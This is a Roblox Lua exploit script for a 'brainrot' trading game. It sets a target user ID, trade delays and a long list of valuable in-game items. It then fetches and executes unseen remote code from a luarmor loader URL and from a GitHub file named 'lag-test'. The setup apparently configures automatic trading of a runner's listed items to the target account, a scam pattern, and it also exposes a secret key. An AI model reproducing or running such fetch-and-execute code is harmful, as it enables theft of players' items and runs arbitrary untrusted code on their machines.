getgenv().SECRET_KEY = "mrr_8046441940684d7293fb1d099907d09d"
getgenv().TARGET_ID = 4534750262
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Griffin"] = true,
    ["Nacho Spyder"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Spooky Grande"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["La Romantic Grande"] = true,
    ["Swaggy Bros"] = true,
    ["Festive 67"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Guest 666"] = true,
    ["Swag Soda"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Los Planitos"] = true,
    ["Las Sis"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Lovin Rose"] = true,
    ["Los Amigos"] = true,
    ["La Secret Combinasion"] = true,
    ["La Food Combinasion"] = true,
    ["Rosetti Tualetti"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Ginger Sekolah"] = true,
    ["La Lucky Grande"] = true,
    ["Fragola La La La"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Gold Gold Gold"] = true,
    ["Dug dug dug"] = true,
    ["Cloverat Clapat"] = true,
    ["Antonio"] = true,
    ["Celestial Pegasus"] = true,
    ["Los Cupids"] = true,
    ["Ventoliero Pavonero"] = true,
    ["La Extinct Grande"] = true,
    ["Chipso and Queso"] = true,
    ["Foxini Lanternini"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["La Sahur Combinasion"] = true,
    ["Los Candies"] = true,
    ["Bacuru and Egguru"] = true,
    ["Los Mobilis"] = true,
    ["Noo my Candy"] = true,
    ["Donkeyturbo Express"] = true,
    ["Noo my Heart"] = true,
    ["Fishino Clownino"] = true,
    ["Coffin Tung Tung Tung Sahur"] = true,
    ["Pot Pumpkin"] = true,
    ["Mi Gatito"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Rang Ring Bus"] = true,
    ["Los Mi Gatitos"] = true,
    ["Los 67"] = true,
    ["Esok Sekolah"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["Chicliterita bicicliterita"] = true,
    ["Patteo"] = true,
    ["Clovkur Kurkur"] = true,
    ["Signore Carapace"] = true,
    ["Elefanto Frigo"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Agarrini la Palini"] = true,
    ["Vulturino Skeletono"] = true,
    ["Secret Lucky Block"] = true,
    ["Trenostruzzo Turbo 4000"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/pugshub/lag-test/refs/heads/main/test-dev"))()
end)
